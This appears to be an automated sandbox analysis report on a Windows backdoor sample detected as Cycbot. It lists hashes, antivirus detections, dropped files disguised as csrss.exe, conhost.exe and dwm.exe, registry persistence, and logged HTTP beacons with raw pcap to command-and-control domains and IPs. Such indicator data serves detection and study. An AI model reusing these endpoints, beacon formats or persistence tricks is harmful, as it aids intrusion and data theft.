Analysis Date2015-01-17 19:00:51
MD53d0652d954b6bc6e69f9ca590f980d69
SHA17baa072d02e41fc9f55b695114c50453899e8c4f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: 5aa3ba463464344310c4304fb514b8ec sha1: 21fe4f4feeb01ae4f43450ff1bb8dfd7ddbcecc8 size: 179712
Section.rdata md5: 276ee1aed137d2174e203b192ad117c8 sha1: 803e909949d8011f2a749f4a4ea16d0a9bbba2eb size: 3072
Section.data md5: eebe96e40b87dfc5ca262aff2e6f3968 sha1: 8947f996f21b4ebb3085dce1ec9c1a462b452217 size: 25600
Section.lib md5: 2d6a421b93b810d17120e379e78afbca sha1: f0a2416508f7e438447fcee2af7a7f188c430862 size: 512
Timestamp2005-11-19 08:43:17
VersionPrivateBuild: 1060
PEhash9349519584f5da07587c78bd41dbd774a46aef13
IMPhash2ab9703cc5acd50fd1e55368310e23a2
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.12685.psa
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-408114
AVDr. WebTrojan.DownLoader2.9472
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KTW
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FN
AVIkarusTrojan-Spy.Win32.Zbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSzoneak.com
Winsock DNSremotesupportsystem.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSremotesupportsystem.com
Type: A
69.13.210.253
DNSzonetf.com
Type: A
141.8.225.80
DNSzoneak.com
Type: A
HTTP GEThttp://remotesupportsystem.com/images/rssuni_small.gif?tq=gP4aKyd8tgkv6EY1DTnRRH0t089e8RxosRCFsT6i%2BeSrzRBIfCSoKm59oxnHM%2BcWYw9K4ameQcBlyPXTVjn%2BDH1mRJlzU%2FI%2FSl2U3Hd3JiYleGEcN%2BPdizRxWOgq%2BdfrC4WqRkI1T3Azf9utvbxNQy1leG%2FywgGjQxFVu3OhVlhYd%2B9NjC2U2MIKT7rVUQntkXqc2KYC3yibAPaFR6G87JzpczLbQ0qUmzuHRjNggnsFx5tbhMINGwdIh3IKOW3d%2BN4enKWD6LmdWEdZ7AkNBKvyKOKs180SUtxqhJb0so5rY3THHeEGTfQs%2FC4ItvM6RbBylnD6eEM3fc2sutN%2Fk3pAoZ7ne3ldbeP%2Bcr3e4pIKU5vQW3qBcah1tc6QwboEbADXveenjdVrdXl7oCBTjQhT2TeLLl826HGEEIhdFoaik%2BB2NX69hgRjrGOgXbJ7e8ANFxnIHU%2F4Q1qIr%2B%2BH%2BTYs18zY8G5cxmY7ZgZxRnu0IGJ5s%2B16ixf36%2F06iuygaP3VneffMrMe23GS3hGd1CNKkV6PxbcPA9FjZ0gaemE%2BBRIZztZ4gNLvZHteSUgyN5puWnErxh7dRc4ZKrYUJcAuDc0vrimQoLL9GC0ZsjcCOg9Xjjp4a
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 69.13.210.253:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 72737375   GET /images/rssu
0x00000010 (00016)   6e695f73 6d616c6c 2e676966 3f74713d   ni_small.gif?tq=
0x00000020 (00032)   67503461 4b796438 74676b76 36455931   gP4aKyd8tgkv6EY1
0x00000030 (00048)   44546e52 52483074 30383965 3852786f   DTnRRH0t089e8Rxo
0x00000040 (00064)   73524346 73543669 25324265 53727a52   sRCFsT6i%2BeSrzR
0x00000050 (00080)   42496643 536f4b6d 35396f78 6e484d25   BIfCSoKm59oxnHM%
0x00000060 (00096)   32426357 5977394b 34616d65 5163426c   2BcWYw9K4ameQcBl
0x00000070 (00112)   79505854 566a6e25 32424448 316d524a   yPXTVjn%2BDH1mRJ
0x00000080 (00128)   6c7a5525 32464925 3246536c 32553348   lzU%2FI%2FSl2U3H
0x00000090 (00144)   64334a69 596c6547 45634e25 32425064   d3JiYleGEcN%2BPd
0x000000a0 (00160)   697a5278 574f6771 25324264 66724334   izRxWOgq%2BdfrC4
0x000000b0 (00176)   5771526b 49315433 417a6639 75747662   WqRkI1T3Azf9utvb
0x000000c0 (00192)   784e5179 316c6547 25324679 7767476a   xNQy1leG%2FywgGj
0x000000d0 (00208)   51784656 75334f68 566c6859 64253242   QxFVu3OhVlhYd%2B
0x000000e0 (00224)   394e6a43 3255324d 494b5437 72565551   9NjC2U2MIKT7rVUQ
0x000000f0 (00240)   6e746b58 7163324b 59433379 69624150   ntkXqc2KYC3yibAP
0x00000100 (00256)   61465236 4738374a 7a70637a 4c625130   aFR6G87JzpczLbQ0
0x00000110 (00272)   71556d7a 7548526a 4e67676e 73467835   qUmzuHRjNggnsFx5
0x00000120 (00288)   7462684d 494e4777 64496833 494b4f57   tbhMINGwdIh3IKOW
0x00000130 (00304)   33642532 424e3465 6e4b5744 364c6d64   3d%2BN4enKWD6Lmd
0x00000140 (00320)   5745645a 37416b4e 424b7679 4b4f4b73   WEdZ7AkNBKvyKOKs
0x00000150 (00336)   31383053 55747871 684a6230 736f3572   180SUtxqhJb0so5r
0x00000160 (00352)   59335448 48654547 54665173 25324643   Y3THHeEGTfQs%2FC
0x00000170 (00368)   34497476 4d365262 42796c6e 44366545   4ItvM6RbBylnD6eE
0x00000180 (00384)   4d336663 32737574 4e253246 6b337041   M3fc2sutN%2Fk3pA
0x00000190 (00400)   6f5a376e 65336c64 62655025 32426372   oZ7ne3ldbeP%2Bcr
0x000001a0 (00416)   33653470 494b5535 76515733 71426361   3e4pIKU5vQW3qBca
0x000001b0 (00432)   68317463 36517762 6f456241 44587665   h1tc6QwboEbADXve
0x000001c0 (00448)   656e6a64 56726458 6c376f43 42546a51   enjdVrdXl7oCBTjQ
0x000001d0 (00464)   68543254 654c4c6c 38323648 47454549   hT2TeLLl826HGEEI
0x000001e0 (00480)   6864466f 61696b25 32424232 4e583639   hdFoaik%2BB2NX69
0x000001f0 (00496)   6867526a 72474f67 58624a37 6538414e   hgRjrGOgXbJ7e8AN
0x00000200 (00512)   46786e49 48552532 46345131 71497225   FxnIHU%2F4Q1qIr%
0x00000210 (00528)   32422532 42482532 42545973 31387a59   2B%2BH%2BTYs18zY
0x00000220 (00544)   38473563 786d5937 5a675a78 526e7530   8G5cxmY7ZgZxRnu0
0x00000230 (00560)   49474a35 73253242 31366978 66333625   IGJ5s%2B16ixf36%
0x00000240 (00576)   32463036 69757967 61503356 6e656666   2F06iuygaP3Vneff
0x00000250 (00592)   4d724d65 32334753 33684764 31434e4b   MrMe23GS3hGd1CNK
0x00000260 (00608)   6b563650 78626350 4139466a 5a306761   kV6PxbcPA9FjZ0ga
0x00000270 (00624)   656d4525 32424252 495a7a74 5a34674e   emE%2BBRIZztZ4gN
0x00000280 (00640)   4c765a48 74655355 67794e35 7075576e   LvZHteSUgyN5puWn
0x00000290 (00656)   45727868 37645263 345a4b72 59554a63   Erxh7dRc4ZKrYUJc
0x000002a0 (00672)   41754463 30767269 6d516f4c 4c394743   AuDc0vrimQoLL9GC
0x000002b0 (00688)   305a736a 63434f67 39586a6a 70346120   0ZsjcCOg9Xjjp4a 
0x000002c0 (00704)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000002d0 (00720)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000002e0 (00736)   743a2072 656d6f74 65737570 706f7274   t: remotesupport
0x000002f0 (00752)   73797374 656d2e63 6f6d0d0a 41636365   system.com..Acce
0x00000300 (00768)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000310 (00784)   656e743a 206f7065 72612f38 2e31310d   ent: opera/8.11.
0x00000320 (00800)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a363520   on: close....65 
0x00000150 (00336)   35333732 37613532 20202073 52434673   53727a52   sRCFs
0x00000160 (00352)   54366925 32426553 727a520a            T6i%2BeSrzR.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a32 37613532 20202073 52434673   ...27a52   sRCFs
0x00000160 (00352)   54366925 32426553 727a520a            T6i%2BeSrzR.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e7746 4b763937 35586c6d   X%2BSNwFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a71 684a6230 736f3572   ose....qhJb0so5r
0x00000160 (00352)   59335448 48654547 54665173 25324643   Y3THHeEGTfQs%2FC
0x00000170 (00368)   34497476 4d365262 42796c6e 44366545   4ItvM6RbBylnD6eE
0x00000180 (00384)   4d336663 32737574 4e253246 6b337041   M3fc2sutN%2Fk3pA
0x00000190 (00400)   6f5a376e 65336c64 62655025 32426372   oZ7ne3ldbeP%2Bcr
0x000001a0 (00416)   33653470 494b5535 76515733 71426361   3e4pIKU5vQW3qBca
0x000001b0 (00432)   68317463 36517762 6f456241 44587665   h1tc6QwboEbADXve
0x000001c0 (00448)   656e6a64 56726458 6c376f43 42546a51   enjdVrdXl7oCBTjQ
0x000001d0 (00464)   68543254 654c4c6c 38323648 47454549   hT2TeLLl826HGEEI
0x000001e0 (00480)   6864466f 61696b25 32424232 4e583639   hdFoaik%2BB2NX69
0x000001f0 (00496)   6867526a 72474f67 58624a37 6538414e   hgRjrGOgXbJ7e8AN
0x00000200 (00512)   46786e49 48552532 46345131 71497225   FxnIHU%2F4Q1qIr%
0x00000210 (00528)   32422532 42482532 42545973 31387a59   2B%2BH%2BTYs18zY
0x00000220 (00544)   38473563 786d5937 5a675a78 526e7530   8G5cxmY7ZgZxRnu0
0x00000230 (00560)   49474a35 73253242 31366978 66333625   IGJ5s%2B16ixf36%
0x00000240 (00576)   32463036 69757967 61503356 6e656666   2F06iuygaP3Vneff
0x00000250 (00592)   4d724d65 32334753 33684764 31434e4b   MrMe23GS3hGd1CNK
0x00000260 (00608)   6b563650 78626350 4139466a 5a306761   kV6PxbcPA9FjZ0ga
0x00000270 (00624)   656d4525 32424252 495a7a74 5a34674e   emE%2BBRIZztZ4gN
0x00000280 (00640)   4c765a48 74655355 67794e35 7075576e   LvZHteSUgyN5puWn
0x00000290 (00656)   45727868 37645263 345a4b72 59554a63   Erxh7dRc4ZKrYUJc
0x000002a0 (00672)   41754463 30767269 6d516f4c 4c394743   AuDc0vrimQoLL9GC
0x000002b0 (00688)   305a736a 63434f67 39586a6a 70346120   0ZsjcCOg9Xjjp4a 
0x000002c0 (00704)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000002d0 (00720)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000002e0 (00736)   743a2072 656d6f74 65737570 706f7274   t: remotesupport
0x000002f0 (00752)   73797374 656d2e63 6f6d0d0a 41636365   system.com..Acce
0x00000300 (00768)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x00000310 (00784)   656e743a 206f7065 72612f38 2e31310d   ent: opera/8.11.
0x00000320 (00800)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 46383225 3242636f   OhLgjh%2F82%2Bco
0x000000c0 (00192)   4a755825 3242534e 78623579 676d3143   JuX%2BSNxb5ygm1C
0x000000d0 (00208)   346c4b76 39373558 6c6d3547 20485454   4lKv975Xlm5G HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6574662e 636f6d0d 0a557365 722d4167   etf.com..User-Ag
0x00000100 (00256)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000110 (00272)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x00000120 (00288)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x00000130 (00304)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x00000140 (00320)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000150 (00336)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000160 (00352)   0a366925 32426553 727a520a            .6i%2BeSrzR.


Strings
2.h
;

040904b0
1060
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
;1W;;{~M
2!A(x(
2gs._j
2qhIcL
$30"=E
.4vsy5A
57F\n8
6tg<d!
7mX_w`
8K]_8v
*+~8MK
8]/"z,U
aK;+\c
AnimatePalette
Be%r$F
CallNextHookEx
ChildWindowFromPoint
ClipCursor
CLSIDFromProgID
CLSIDFromString
CoCreateGuid
CoCreateInstance
CoFreeUnusedLibraries
CoGetClassObject
CoGetMalloc
COMCTL32.dll
comdlg32.dll
CompareStringW
CoTaskMemAlloc
CoTaskMemFree
CreateFiber
CreateFontIndirectA
CreateILockBytesOnHGlobal
CreatePen
CreateStreamOnHGlobal
@<d7uX
,d99*=
@.data
DefWindowProcW
DestroyCursor
DestroyIcon
DrawEdge
EmptyClipboard
EnumResourceNamesW
ExtCreatePen
FileTimeToLocalFileTime
FileTimeToSystemTime
FindResourceExA
FK,4pU
FlattenPath
FlushFileBuffers
g{7P5x2
GDI32.dll
GetBitmapBits
GetBkColor
GetFileAttributesA
GetFileTime
GetFileTitleA
GetFileType
GetHGlobalFromILockBytes
GetHGlobalFromStream
GetPath
GetProfileStringW
GetSysColor
GetSysColorBrush
GetSystemDirectoryW
GetSystemTime
GetUserDefaultLangID
GetVersionExW
GetVolumeInformationW
GK4~3SQz9
g,*m,lX
:H3~:b~
[<H\ pU
hsr=WtOX;
Ii!DT/
-=iLOWI
ImageList_Add
ImageList_Create
ImageList_Destroy
ImageList_DrawEx
ImageList_GetIconSize
IsClipboardFormatAvailable
IsDBCSLeadByte
itm6:K
JCj<Y;M
J.i\*d
JRichu
{J^uoA
KERNEL32.dll
kj?8hX
%KL#e[k
=lJ=*(D
LK#CMG[
LocalAlloc
LockFile
lq98u,
l~v,Od
\ly^u$
MonitorFromWindow
;N}1?6
NdrClientCall
ole32.dll
OleDuplicateData
OleGetAutoConvert
OleRegGetUserType
OleRun
O(=-u(S
o	YM_)
PathCanonicalizeW
PathCombineW
PathIsRelativeW
PathIsRootW
PathIsURLW
PathStripToRootW
PlgBlt
PolyBezier
>P]p4T
ProgIDFromCLSID
qV3'g7j
`.rdata
RegisterClassW
RegisterDragDrop
ReleaseStgMedium
RevokeDragDrop
r#Jt'/)
RoundRect
RpcBindingFromStringBindingA
RpcBindingSetAuthInfoA
RPCRT4.dll
RpcStringBindingComposeA
RpcStringFreeA
s'8k8C
SearchPathW
SetClipboardData
SetCommConfig
SetDIBits
SetEndOfFile
SetScrollRange
SetStretchBltMode
SetTextColor
SetWindowPos
SetWindowsHookExW
SHLWAPI.dll
StgCreateDocfileOnILockBytes
StgOpenStorageOnILockBytes
StringFromCLSID
StrokePath
t*23j+`b
T"!6rq
TG%[WMv
!This program cannot be run in DOS mode.
{,T|{It
ToAscii
`u/\jJ
u[js3S
UnhookWindowsHookEx
UnlockFile
USER32.dll
VerLanguageNameW
VM?k.'
vYiK4Q
<W5(7 
@W6,3b
w)	iKk
WinHelpW
W)RB@\
x5xo Tu
x,gPNS
xQS`~v
Xrs"r8}3
+Xw^-%
}(y'+3
.y>M;r
	zIt>z 
z}X[y1